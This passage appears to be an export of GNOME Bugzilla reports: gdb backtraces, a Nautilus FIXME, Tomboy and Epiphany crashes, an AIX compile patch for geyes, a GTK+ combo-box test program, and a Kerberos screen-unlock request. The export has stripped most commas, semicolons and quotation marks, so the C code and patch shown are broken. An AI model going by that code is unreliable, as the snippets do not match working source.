#349 0x0000000000000000 in ?? ()
#350 0x0000000000552180 in ?? ()
#351 0x0000000000000000 in ?? ()
#352 0x0000000802219c10 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.600
#353 0x00000008007a6bf0 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#354 0x00000008007a6ca0 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#355 0x00000008007a6b40 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#356 0x00000008007a6b90 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#357 0x0000000802218390 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#358 0x0000000000000000 in ?? ()
#359 0x0000000000000000 in ?? ()
#360 0x0000000000000000 in ?? ()
#361 0x0000000000000000 in ?? ()
#362 0x0000000000000000 in ?? ()
#363 0x0000000000000000 in ?? ()
#364 0x0000000000000000 in ?? ()
#365 0x0000000000000000 in ?? ()
#366 0x0000000000000000 in ?? ()
#367 0x0000000000000000 in ?? ()
#368 0x00000008007a6b80 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#369 0x4f534900352d3935 in ?? ()
#370 0x00352d393538385f in ?? ()
#371 0x393538382d4f5349 in ?? ()
#372 0x38384f534900352d in ?? ()
#373 0x4f534900372d3935 in ?? ()
#374 0x00372d393538382d in ?? ()
#375 0x393538385f4f5349 in ?? ()
#376 0x382d4f534900372d in ?? ()
#377 0x534900372d393538 in ?? ()
#378 0x00392d393538384f in ?? ()
#379 0x393538382d4f5349 in ?? ()
#380 0x000000000000392d in ?? ()
#381 0x0000000000000003 in ?? ()
#382 0x0000000000535ca0 in g_thread_functions_for_glib_use ()
#383 0x0000000000545b50 in ?? ()
#384 0x0000000000545b60 in ?? ()
#385 0x0000000000545b70 in ?? ()
#386 0x0000000000545b80 in ?? ()
#387 0x0000000000538900 in ?? ()
#388 0x0000000000000000 in ?? ()
#389 0x0000000000000000 in ?? ()
#390 0x0000000000000000 in ?? ()
#391 0x00000000005388e0 in ?? ()
#392 0x0000000100000001 in ?? ()
#393 0x0000000000000000 in ?? ()
#394 0x0000000000000000 in ?? ()
#395 0x0000000000545bd0 in ?? ()
#396 0x0000000000545be0 in ?? ()
#397 0x0000000000538840 in ?? ()
#398 0x0000000000000002 in ?? ()
#399 0x0000000000557000 in ?? ()
#400 0x000000000054e448 in ?? ()
#401 0x000000000054a6a0 in ?? ()
#402 0x0000000000000000 in ?? ()
#403 0x0000000000000000 in ?? ()
#404 0x0000000000000000 in ?? ()
#405 0x0000000000000000 in ?? ()
#406 0x0000000000000000 in ?? ()
#407 0x0000000000000000 in ?? ()
#408 0x0000000000000000 in ?? ()
#409 0x0000000000000000 in ?? ()
#410 0x0000000000000000 in ?? ()
#411 0x0000000000000000 in ?? ()
#412 0x0000000000000000 in ?? ()
#413 0x0000000000552280 in ?? ()
#414 0x0000000000000000 in ?? ()
#415 0x0000000802219c10 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.600
#416 0x0000000000000000 in ?? ()
#417 0x0000000000000000 in ?? ()
#418 0x00000008007a6b40 in gtk_object_destroy ()
   from /usr/X11R6/lib/libgtk-x11-2.0.so.600
#419 0x0000000800aea3d0 in gnome_client_get_type ()
   from /usr/X11R6/lib/libgnomeui-2.so.1000
#420 0x0000000802218390 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#421 0x0000000000000000 in ?? ()
#422 0x0000000000000000 in ?? ()
#423 0x0000000000000000 in ?? ()
#424 0x0000000000000000 in ?? ()
#425 0x0000000000000000 in ?? ()
#426 0x0000000000000000 in ?? ()
#427 0x0000000000000000 in ?? ()
#428 0x0000000000000000 in ?? ()
#429 0x0000000000000000 in ?? ()
#430 0x0000000000000000 in ?? ()
#431 0x0000000800aea2b0 in gnome_client_get_type ()
   from /usr/X11R6/lib/libgnomeui-2.so.1000
#432 0x0000000000000000 in ?? ()
#433 0x0000000800aea950 in gnome_client_connect ()
   from /usr/X11R6/lib/libgnomeui-2.so.1000
#434 0x0000000800aec020 in gnome_client_get_global_config_prefix ()
   from /usr/X11R6/lib/libgnomeui-2.so.1000
#435 0x0000000800aec2f0 in gnome_client_get_global_config_prefix ()
   from /usr/X11R6/lib/libgnomeui-2.so.1000
#436 0x0000000000000000 in ?? ()
#437 0x0000000000000000 in ?? ()
#438 0x0000000000000000 in ?? ()
#439 0x0000000000000000 in ?? ()
#440 0x0000000000000000 in ?? ()
#441 0x000000000056a580 in ?? ()
#442 0x0000000000000000 in ?? ()
#443 0x0000000802219c10 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.600
#444 0x0000000000000000 in ?? ()
#445 0x0000000000000000 in ?? ()
#446 0x0000000802218270 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#447 0x0000000802218390 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#448 0x0000000000000000 in ?? ()
#449 0x0000000000000000 in ?? ()
#450 0x0000000000000000 in ?? ()
#451 0x0000000000000000 in ?? ()
#452 0x0000000000000000 in ?? ()
#453 0x0000000000000000 in ?? ()
#454 0x0000000000000000 in ?? ()
#455 0x0000000000000000 in ?? ()
#456 0x0000000000552280 in ?? ()
#457 0x0000000600000063 in ?? ()
#458 0x0000000000552280 in ?? ()
#459 0x0000000700000064 in ?? ()
#460 0x0000000000552280 in ?? ()
#461 0x0000000800000065 in ?? ()
#462 0x000000000056a000 in ?? ()
#463 0x0000000900000068 in ?? ()
#464 0x000000000056a280 in ?? ()
#465 0x0000000a0000006b in ?? ()
#466 0x000000000056a280 in ?? ()
#467 0x0000000a0000006c in ?? ()
#468 0x000000000056a380 in ?? ()
#469 0x0000000b0000006d in ?? ()
#470 0x0000000000000000 in ?? ()
#471 0x000000000053ed00 in ?? ()
#472 0x0000000000000001 in ?? ()
#473 0x0000000000000000 in ?? ()
#474 0x0000000000000002 in ?? ()
#475 0x0000000000571d00 in ?? ()
#476 0x0000000000575740 in ?? ()
#477 0x0000000000000000 in ?? ()
#478 0x0000000000000000 in ?? ()
#479 0x0000000000000000 in ?? ()
#480 0x0000000000000000 in ?? ()
#481 0x0000000000000000 in ?? ()
#482 0x0000000000553370 in ?? ()
#483 0x0000000000000000 in ?? ()
#484 0x0000000000536e40 in ?? ()
#485 0x0000000000002106 in ?? ()
#486 0x0000000000553340 in ?? ()
#487 0x0000000000000000 in ?? ()
#488 0x0000000000553350 in ?? ()
#489 0x00000000ffffffff in ?? ()
#490 0x0000000000000000 in ?? ()
#491 0x0000000000553330 in ?? ()
#492 0x0000000000000000 in ?? ()
#493 0x0000000000000000 in ?? ()
#494 0x0000000000000000 in ?? ()
#495 0x0000000000000000 in ?? ()
#496 0x0000000000000000 in ?? ()
#497 0x0000000000000000 in ?? ()
#498 0x0000000000000000 in ?? ()
#499 0x0000000000000000 in ?? ()
#500 0x0000000000000000 in ?? ()
#501 0x0000000000000000 in ?? ()
#502 0x0000000000000000 in ?? ()
#503 0x0000000000000000 in ?? ()
#504 0x000000000053f000 in ?? ()
#505 0x0000000000000000 in ?? ()
#506 0x0000000000000000 in ?? ()
#507 0x0000000000000000 in ?? ()
#508 0x0000000000000000 in ?? ()
#509 0x000000000053f028 in ?? ()
#510 0x0000000000000000 in ?? ()
#511 0x0000000000000000 in ?? ()
#512 0x0000000000000001 in ?? ()
#513 0x0000000000000000 in ?? ()
#514 0x000000000053f050 in ?? ()
#515 0x0000000000000000 in ?? ()
#516 0x0000000000000000 in ?? ()
#517 0x0000000000000002 in ?? ()
#518 0x0000000000000000 in ?? ()
#519 0x000000000053f078 in ?? ()
#520 0x0000000000000000 in ?? ()
#521 0x0000000000000000 in ?? ()
#522 0x0000000000000003 in ?? ()
#523 0x0000000000000000 in ?? ()
#524 0x000000000053f0a0 in ?? ()
#525 0x0000000000000000 in ?? ()
#526 0x0000000000000000 in ?? ()
#527 0x0000000000000004 in ?? ()
#528 0x0000000000000000 in ?? ()
#529 0x000000000053f0c8 in ?? ()
#530 0x0000000000000000 in ?? ()
#531 0x0000000000000000 in ?? ()
#532 0x0000000000000005 in ?? ()
#533 0x0000000000000000 in ?? ()
#534 0x000000000053f0f0 in ?? ()
#535 0x0000000000000000 in ?? ()
#536 0x0000000000000000 in ?? ()
#537 0x0000000000000006 in ?? ()
#538 0x0000000000000000 in ?? ()
#539 0x000000000053f118 in ?? ()
#540 0x0000000000000000 in ?? ()
#541 0x0000000000000000 in ?? ()
#542 0x0000000000000007 in ?? ()
#543 0x0000000000000000 in ?? ()
#544 0x000000000053f140 in ?? ()
#545 0x0000000000000000 in ?? ()
#546 0x0000000000000000 in ?? ()
#547 0x0000000000000008 in ?? ()
#548 0x0000000000000000 in ?? ()
#549 0x000000000053f168 in ?? ()
#550 0x0000000000000000 in ?? ()
#551 0x0000000000000000 in ?? ()
#552 0x0000000000000009 in ?? ()
#553 0x0000000000000000 in ?? ()
#554 0x000000000053f190 in ?? ()
#555 0x0000000000000000 in ?? ()
#556 0x0000000000000000 in ?? ()
#557 0x000000000000000a in ?? ()
#558 0x0000000000000000 in ?? ()
#559 0x000000000053f1b8 in ?? ()
#560 0x0000000000000000 in ?? ()
#561 0x0000000000000000 in ?? ()
#562 0x000000000000000b in ?? ()
#563 0x0000000000000000 in ?? ()
#564 0x000000000053f1e0 in ?? ()
#565 0x0000000000000000 in ?? ()
#566 0x0000000000000000 in ?? ()
#567 0x000000000000000c in ?? ()
#568 0x0000000000000000 in ?? ()
#569 0x000000000053f208 in ?? ()
#570 0x0000000000000000 in ?? ()
#571 0x0000000000000000 in ?? ()
#572 0x000000000000000d in ?? ()
#573 0x0000000000000000 in ?? ()
#574 0x000000000053f230 in ?? ()
#575 0x0000000000000000 in ?? ()
#576 0x0000000000000000 in ?? ()
#577 0x000000000000000e in ?? ()
#578 0x0000000000000000 in ?? ()
#579 0x000000000053f258 in ?? ()
#580 0x0000000000000000 in ?? ()
#581 0x000000000053e130 in ?? ()
#582 0x000000000000000f in ?? ()
#583 0x0000000000000000 in ?? ()
#584 0x000000000053f280 in ?? ()
#585 0x0000000000000000 in ?? ()
#586 0x0000000000000000 in ?? ()
#587 0x0000000000000010 in ?? ()
#588 0x0000000000000000 in ?? ()
#589 0x000000000053f2a8 in ?? ()
#590 0x0000000000000000 in ?? ()
#591 0x0000000000000000 in ?? ()
#592 0x0000000000000011 in ?? ()
#593 0x0000000000000000 in ?? ()
#594 0x000000000053f2d0 in ?? ()
#595 0x0000000000000000 in ?? ()
#596 0x0000000000000000 in ?? ()
#597 0x0000000000000012 in ?? ()
#598 0x0000000000000000 in ?? ()
#599 0x000000000053f2f8 in ?? ()
#600 0x0000000000000000 in ?? ()
#601 0x0000000000000000 in ?? ()
#602 0x0000000000000013 in ?? ()
#603 0x0000000000000000 in ?? ()
#604 0x000000000053f320 in ?? ()
#605 0x0000000000000000 in ?? ()
#606 0x0000000000000000 in ?? ()
#607 0x0000000000000014 in ?? ()
#608 0x0000000000000000 in ?? ()
#609 0x000000000053f348 in ?? ()
#610 0x0000000000000000 in ?? ()
#611 0x0000000000000000 in ?? ()
#612 0x0000000000000015 in ?? ()
#613 0x0000000000000000 in ?? ()
#614 0x000000000053f370 in ?? ()
#615 0x0000000000000000 in ?? ()
#616 0x0000000000000000 in ?? ()
#617 0x0000000000000016 in ?? ()
#618 0x0000000000000000 in ?? ()
#619 0x000000000053f398 in ?? ()
#620 0x0000000000000000 in ?? ()
#621 0x0000000000000000 in ?? ()
#622 0x0000000000000017 in ?? ()
#623 0x0000000000000000 in ?? ()
#624 0x000000000053f3c0 in ?? ()
#625 0x0000000000000000 in ?? ()
#626 0x0000000000000000 in ?? ()
#627 0x0000000000000018 in ?? ()
#628 0x0000000000000000 in ?? ()
#629 0x000000000053f3e8 in ?? ()
#630 0x0000000000000000 in ?? ()
#631 0x0000000000000000 in ?? ()
#632 0x0000000000000019 in ?? ()
#633 0x0000000000000000 in ?? ()
#634 0x000000000053f410 in ?? ()
#635 0x0000000000000000 in ?? ()
#636 0x0000000000000000 in ?? ()
#637 0x000000000000001a in ?? ()
#638 0x0000000000000000 in ?? ()
#639 0x000000000053f438 in ?? ()
#640 0x0000000000000000 in ?? ()
#641 0x0000000000000000 in ?? ()
#642 0x000000000000001b in ?? ()
#643 0x0000000000000000 in ?? ()
#644 0x000000000053f460 in ?? ()
#645 0x0000000000000000 in ?? ()
#646 0x0000000000000000 in ?? ()
#647 0x000000000000001c in ?? ()
#648 0x0000000000000000 in ?? ()
#649 0x000000000053f488 in ?? ()
#650 0x0000000000000000 in ?? ()
#651 0x0000000000000000 in ?? ()
#652 0x000000000000001d in ?? ()
#653 0x0000000000000000 in ?? ()
#654 0x000000000053f4b0 in ?? ()
#655 0x0000000000000000 in ?? ()
#656 0x0000000000000000 in ?? ()
#657 0x000000000000001e in ?? ()
#658 0x0000000000000000 in ?? ()
#659 0x000000000053f4d8 in ?? ()
#660 0x0000000000000000 in ?? ()
#661 0x0000000000000000 in ?? ()
#662 0x000000000000001f in ?? ()
#663 0x0000000000000000 in ?? ()
#664 0x000000000053f500 in ?? ()
#665 0x0000000000000000 in ?? ()
#666 0x0000000000000000 in ?? ()
#667 0x0000000000000020 in ?? ()
#668 0x0000000000000000 in ?? ()
#669 0x000000000053f528 in ?? ()
#670 0x0000000000000000 in ?? ()
#671 0x0000000000000000 in ?? ()
#672 0x0000000000000021 in ?? ()
#673 0x0000000000000000 in ?? ()
#674 0x000000000053f550 in ?? ()
#675 0x0000000000000000 in ?? ()
#676 0x0000000000000000 in ?? ()
#677 0x0000000000000022 in ?? ()
#678 0x0000000000000000 in ?? ()
#679 0x000000000053f578 in ?? ()
#680 0x0000000000000000 in ?? ()
#681 0x0000000000000000 in ?? ()
#682 0x0000000000000023 in ?? ()
#683 0x0000000000000000 in ?? ()
#684 0x000000000053f5a0 in ?? ()
#685 0x0000000000000000 in ?? ()
#686 0x0000000000000000 in ?? ()
#687 0x0000000000000024 in ?? ()
#688 0x0000000000000000 in ?? ()
#689 0x000000000053f5c8 in ?? ()
#690 0x0000000000000000 in ?? ()
#691 0x0000000000000000 in ?? ()
#692 0x0000000000000025 in ?? ()
#693 0x0000000000000000 in ?? ()
#694 0x000000000053f5f0 in ?? ()
#695 0x0000000000000000 in ?? ()
#696 0x0000000000000000 in ?? ()
#697 0x0000000000000026 in ?? ()
#698 0x0000000000000000 in ?? ()
#699 0x000000000053f618 in ?? ()
#700 0x0000000000000000 in ?? ()
#701 0x0000000000000000 in ?? ()
#702 0x0000000000000027 in ?? ()
#703 0x0000000000000000 in ?? ()
#704 0x000000000053f640 in ?? ()
#705 0x0000000000000000 in ?? ()
#706 0x0000000000000000 in ?? ()
#707 0x0000000000000028 in ?? ()
#708 0x0000000000000000 in ?? ()
#709 0x000000000053f668 in ?? ()
#710 0x0000000000000000 in ?? ()
#711 0x0000000000000000 in ?? ()
#712 0x0000000000000029 in ?? ()
#713 0x0000000000000000 in ?? ()
#714 0x000000000053f690 in ?? ()
#715 0x0000000000000000 in ?? ()
#716 0x0000000000000000 in ?? ()
#717 0x000000000000002a in ?? ()
#718 0x0000000000000000 in ?? ()
#719 0x000000000053f6b8 in ?? ()
#720 0x0000000000000000 in ?? ()
#721 0x0000000000000000 in ?? ()
#722 0x000000000000002b in ?? ()
#723 0x0000000000000000 in ?? ()
#724 0x000000000053f6e0 in ?? ()
#725 0x0000000000000000 in ?? ()
#726 0x0000000000000000 in ?? ()
#727 0x000000000000002c in ?? ()
#728 0x0000000000000000 in ?? ()
#729 0x000000000053f708 in ?? ()
#730 0x0000000000000000 in ?? ()
#731 0x0000000000000000 in ?? ()
#732 0x000000000000002d in ?? ()
#733 0x0000000000000000 in ?? ()
#734 0x000000000053f730 in ?? ()
#735 0x0000000000000000 in ?? ()
#736 0x0000000000000000 in ?? ()
#737 0x000000000000002e in ?? ()
#738 0x0000000000000000 in ?? ()
#739 0x000000000053f758 in ?? ()
#740 0x0000000000000000 in ?? ()
#741 0x0000000000000000 in ?? ()
#742 0x000000000000002f in ?? ()
#743 0x0000000000000000 in ?? ()
#744 0x000000000053f780 in ?? ()
#745 0x0000000000000000 in ?? ()
#746 0x0000000000000000 in ?? ()
#747 0x0000000000000030 in ?? ()
#748 0x0000000000000000 in ?? ()
#749 0x000000000053f7a8 in ?? ()
#750 0x0000000000000000 in ?? ()
#751 0x0000000000000000 in ?? ()
#752 0x0000000000000031 in ?? ()
#753 0x0000000000000000 in ?? ()
#754 0x000000000053f7d0 in ?? ()
#755 0x0000000000000000 in ?? ()
#756 0x0000000000000000 in ?? ()
#757 0x0000000000000032 in ?? ()
#758 0x0000000000000000 in ?? ()
#759 0x000000000053f7f8 in ?? ()
#760 0x0000000000000000 in ?? ()
#761 0x0000000000000000 in ?? ()
#762 0x0000000000000033 in ?? ()
#763 0x0000000000000000 in ?? ()
#764 0x000000000053f820 in ?? ()
#765 0x0000000000000000 in ?? ()
#766 0x0000000000000000 in ?? ()
#767 0x0000000000000034 in ?? ()
#768 0x0000000000000000 in ?? ()
#769 0x000000000053f848 in ?? ()
#770 0x0000000000000000 in ?? ()
#771 0x0000000000000000 in ?? ()
#772 0x0000000000000035 in ?? ()
#773 0x0000000000000000 in ?? ()
#774 0x000000000053f870 in ?? ()
#775 0x0000000000000000 in ?? ()
#776 0x0000000000000000 in ?? ()
#777 0x0000000000000036 in ?? ()
#778 0x0000000000000000 in ?? ()
#779 0x000000000053f898 in ?? ()
</t>
  </si>
  <si>
    <t>NAUTILUS-44752</t>
  </si>
  <si>
    <t>remove desktop menu bar no resize hack</t>
  </si>
  <si>
    <t xml:space="preserve">There's a FIXME in nautilus-window.c. Once gtk_menu_item_size_allocate
is fixed this hack can be removed.
------- Additional Comments From eli@eazel.com 2001-02-09 11:28:46 ----
Duane is now the proud owner for Desktop QA.
------- Additional Comments From eli@eazel.com 2001-03-26 11:20:17 ----
SPAAAAAAAAAM! 
(Jon Allen has taken these components QA Assigning bugs to him.)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:45 -------
The original reporter (engber@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
The original owner (engber@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>LDTP-339901</t>
  </si>
  <si>
    <t>ldtp</t>
  </si>
  <si>
    <t>getobjectlist() is not replacing special characters</t>
  </si>
  <si>
    <t>The appmap function is not replacing the special characters like '' while calling getobjectlist()
this can be reproduced by running getobjectlist() on the gedit preferences window.</t>
  </si>
  <si>
    <t>prashmohan</t>
  </si>
  <si>
    <t>TOMBOY-346010</t>
  </si>
  <si>
    <t>Unhandled exception when a note is broken</t>
  </si>
  <si>
    <t>My notebook ran out of battery and turned off.  When I booted it up again some files looked like empty one of them was the tomboy's note where I was writing.
After that tomboy couldn't start again.
The output is:
$ tomboy
Trying Plugin: Evolution.dll ... EvolutionPlugin. Done.
Trying Plugin: ExportToHTML.dll ... ExportToHTMLPlugin. Done.
Trying Plugin: PrintNotes.dll ... PrintPlugin. Done.
Unhandled Exception: System.Xml.XmlException: Document element did not appear. Line 1 position 1.
in  System.Xml.XmlTextReader:Read ()
in  Tomboy.NoteArchiver:Read (System.String read_file Tomboy.Note note)
in  Tomboy.Note:Load (System.String read_file Tomboy.NoteManager manager)
in  Tomboy.NoteManager:.ctor (System.String directory System.String backup_directory)
in  Tomboy.NoteManager:.ctor (System.String directory)
in  Tomboy.NoteManager:.ctor ()
in  Tomboy.Tomboy:Main (System.String[] args)
I'm using Ubuntu Dapper and Tomboy 0.3.5.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-55961</t>
  </si>
  <si>
    <t>geyes - minor fixes to compile on AIX.</t>
  </si>
  <si>
    <t>The following minor changes are needed when using the
picky IBM compiler.
Dan
--- gnome-applets-1.4.0.1/geyes/geyes.c.orig    Fri Jun  8 11:16:12 2001
+++ gnome-applets-1.4.0.1/geyes/geyes.c Fri Jun  8 11:20:41 2001
@@ -1810 +1810 @@
  */
 #include 
+#include 
 #include 
 #include 
 #include 
-#include 
 #include geyes.h
@@ -4218 +4217 @@
         properties_load (APPLET_WIDGET (eyes_applet.applet)-&gt;privcfgpath)
         create_eyes ()
-        timeout_handle = gtk_timeout_add (UPDATE_TIMEOUT 
-                                                                                
(void *) timer_cb NULL)
+        timeout_handle = gtk_timeout_add (UPDATE_TIMEOUT
(GtkFunction)timer_cb NULL)
         gtk_widget_show (eyes_applet.applet)</t>
  </si>
  <si>
    <t>EVOLUTION-243707</t>
  </si>
  <si>
    <t>Mailer fails to launch contact editor</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Mailer Add-to-contacts dialog fails to launch contact editor
Steps to reproduce the problem:
1. Select email in inbox
2. Right click on From: address
3. Left click on Add-to-contacts
4. Left click on Edit-Full
Actual Results:
Nothing
Expected Results:
Contact editor launched with new contact
How often does this happen? 
Every time
Additional Information:</t>
  </si>
  <si>
    <t>mowgli</t>
  </si>
  <si>
    <t>GTK+-127332</t>
  </si>
  <si>
    <t>Tooltip display is not Xinerama aware</t>
  </si>
  <si>
    <t>I am using Debian package libgtk2.0-0 version 2.2.4-2 and have a Xinerama
setup as follows:
Monitor #0: 1024x768 (left)
Monitor #1: 1400x1050 (right)
And the top edges of the two monitors are aligned.  I have a panel placed
at the bottom of monitor #0 and noticed that all the tooltips of the
applets on the panel are gone.  Well they are not really gone but just
that GTK+ decided that since the vertical resolution of the screen is 1050
it should be okay to draw the tooltips below the cursor which has y
coordinate larger than 1024 so I cannot actually see them.  The relevant
code is in the gtk_tooltips_draw_tips() function.
Ideally GTK+ should determine which monitor is the cursor in and make sure
that the tooltip resides completely in that monitor.</t>
  </si>
  <si>
    <t>linchuan</t>
  </si>
  <si>
    <t>EVOLUTION-245328</t>
  </si>
  <si>
    <t>Alt+PageUp/PageDown go to the first/last day in current month in dayview</t>
  </si>
  <si>
    <t>GTK+-309250</t>
  </si>
  <si>
    <t>popuplist of combo_box_entry in listmode is to wide</t>
  </si>
  <si>
    <t>Please describe the problem:
Because we need entrys and combo_box_entry whith specifid wide we have
combo_box_entry with wide = 1. Because there is no interface we get the pointer
of the entry from then structur entryW = GTK_ENTRY (GTK_BIN (comboboxtext)-&gt;child).
Ok it's tricky but we found no other way.
Next we need list-mode for the popup. 
If the wide is one char following things happens:
1. because the list is 2 or 3 pixel wider the list become a little horicontal
scroller.
2. if there are 30 rows in the list the list become a vertical scroller with
the result the content of the list is covered.
Steps to reproduce:
Here is a little program to illustrate it:
#include 
#include 
#include 
#include 
static void
setup_combo_entry (GtkWidget *entry_box gint anz)
{
        gchar   text[] = a
        gchar   buchstabe = 33
        while(anz){
                gtk_combo_box_append_text (GTK_COMBO_BOX (entry_box)
                                   text)
                anz--
                text[0] = buchstabe++
        }
}
int
main (int argc char **argv)
{
        GtkWidget *window *mainbox
        GtkWidget *comboboxtext
        GtkWidget *tmp *boom
        GtkEntry *entryW = NULL
        gchar *rc_string
        gtk_init (
        window = gtk_window_new (GTK_WINDOW_TOPLEVEL)
        gtk_container_set_border_width (GTK_CONTAINER (window) 5)
        g_signal_connect (window destroy gtk_main_quit NULL)
        mainbox = gtk_vbox_new (FALSE 0)
        gtk_container_add (GTK_CONTAINER (window) mainbox)
        /* listmodus */
        rc_string = g_strdup_printf (style \%s-style\ {\n
                                         GtkComboBox::appears-as-list = %d\n
                                       }\n
                                       \n
                                       widget \*.%s\ style \%s-style\
                                       Name TRUE Name Name)
        gtk_rc_parse_string (rc_string)
        g_free (rc_string)
        /* GtkComboBoxEntry horizontal scroller */
        tmp = gtk_frame_new (NULL)
        gtk_box_pack_start (GTK_BOX (mainbox) tmp FALSE FALSE 0)
        boom = gtk_vbox_new (FALSE 0)
        gtk_container_set_border_width (GTK_CONTAINER (boom) 5)
        gtk_container_add (GTK_CONTAINER (tmp) boom)
        comboboxtext = gtk_combo_box_entry_new_text ()
        gtk_widget_set_name(comboboxtext Name)
        /* set width of entry- ok tricky because no interface but necessary */
        entryW = GTK_ENTRY (GTK_BIN (comboboxtext)-&gt;child)
        gtk_entry_set_width_chars(GTK_ENTRY(entryW) 1)
        setup_combo_entry (comboboxtext2)
        gtk_container_add (GTK_CONTAINER (boom) comboboxtext)
        gtk_widget_show_all (boom)
        /* GtkComboBoxEntry vertical scroller */
        tmp = gtk_frame_new (NULL)
        gtk_box_pack_start (GTK_BOX (mainbox) tmp FALSE FALSE 0)
        boom = gtk_vbox_new (FALSE 0)
        gtk_container_set_border_width (GTK_CONTAINER (boom) 5)
        gtk_container_add (GTK_CONTAINER (tmp) boom)
        comboboxtext = gtk_combo_box_entry_new_text ()
        gtk_widget_set_name(comboboxtext Name)
        /* set width of entry */
        entryW = GTK_ENTRY (GTK_BIN (comboboxtext)-&gt;child)
        gtk_entry_set_width_chars(GTK_ENTRY(entryW) 1)
        setup_combo_entry (comboboxtext45)
        gtk_container_add (GTK_CONTAINER (boom) comboboxtext)
        gtk_widget_show_all (window)
        gtk_main ()
        return 0
}
Actual results:
see the program
Expected results:
Does this happen every time?
yes
Other information:
is it possible to create an interface like 
gtk_combo_box_entry_set_width_chars() ? to set the wide of the combo_box_entry</t>
  </si>
  <si>
    <t>Bernd.Demian</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-333411</t>
  </si>
  <si>
    <t>Obtain new Kerberos credentials when unlocking screen</t>
  </si>
  <si>
    <t>When unlocking the screen new Kerberos credentials should be obtained at the
very least in the case when they have expired (this could be made unconditional
as well but that's not as much of a deal). When I unlock my system in the
morning I find myself entering my password twice: once for gnome-screensaver
once for the krb5-auth-dialog dialog that is waiting on the desktop.
Other information:
I am not sure whether gnome-screensaver or krb5-auth-dialog should request the
new ticket (if the latter is running at all). In case the former takes care of
it freshly submitted bug #333406 needs to be fixed as well or the
krb5-auth-dialog prompt will remain onscreen indefinitely. In case the latter
does it (since it's the program that already knows how to deal with kerberos and
getting new credentials) then there should be some way for gnome-screensaver to
forward the password to krb5-auth-dialog.</t>
  </si>
  <si>
    <t>nutello</t>
  </si>
  <si>
    <t>EPIPHANY-137817</t>
  </si>
  <si>
    <t>linux errors</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: epiphany
Severity: normal
Version:  1.0.6
Synopsis: linux errors
Bugzilla-Product: epiphany
Bugzilla-Component: General
Bugzilla-Version: 1.0.6
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
Steps to reproduce the crash:
1. 
2. 
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/epiphany'
(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ew Thread 16384 (LWP 1055)]
[New Thread 32769 (LWP 1057)]
[New Thread 16386 (LWP 1058)]
[New Thread 32771 (LWP 1059)]
[New Thread 49156 (LWP 1060)]
[New Thread 114693 (LWP 1147)]
(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0x40b41bdb in waitpid () from
/lib/libpthread.so.0
#0  0x40b41bdb in waitpid () from /lib/libpthread.so.0
#1  0x402b4a94 in ?? () from /usr/lib/libgnomeui-2.so.0
#2  0xfffffff4 in ?? ()
#3  0x4027a884 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4003f4f2 in nsProfileLock::FatalSignalHandler(int) ()
   from /usr/lib/libgtkembedmoz.so
#5  0x40b407f5 in __pthread_sighandler () from /lib/libpthread.so.0
#6  
#7  0x0808dc83 in ephy_embed_selection_can_copy ()
#8  0x0809542b in print_dialog_get_type ()
#9  0x080b9ff1 in ephy_dialog_show ()
#10 0x080b9e12 in ephy_dialog_add_enum ()
#11 0x080b9fd1 in ephy_dialog_run ()
#12 0x080acf55 in GPrintingPromptService::ShowPrintDialog(nsIDOMWindow*
nsIWebBrowserPrint* nsIPrintSettings*) ()
#13 0x414676a3 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#14 0x41496952 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#15 0x41bf8dd5 in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
#16 0x400fe7d5 in XPTC_InvokeByIndex () from
/usr/lib/mozilla/libxpcom.so
#17 0x411ac88f in NSGetModule ()
   from /usr/lib/mozilla/components/libxpconnect.so
#18 0x411b38f5 in NSGetModule ()
   from /usr/lib/mozilla/components/libxpconnect.so
#19 0x41109656 in js_Invoke () from /usr/lib/libmozjs.so
#20 0x4111362f in js_Interpret () from /usr/lib/libmozjs.so
#21 0x411097df in js_Invoke () from /usr/lib/libmozjs.so
#22 0x41109ad3 in js_InternalInvoke () from /usr/lib/libmozjs.so
#23 0x410e57bb in JS_CallFunctionValue () from /usr/lib/libmozjs.so
#24 0x41bedb7d in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
#25 0x41c244d8 in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
#26 0x41502d50 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#27 0x4150415d in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#28 0x414a8b28 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#29 0x41567aa3 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#30 0x4136b1bc in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#31 0x4136b093 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#32 0x4150d7eb in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#33 0x4150bcfe in NSGetModule ()
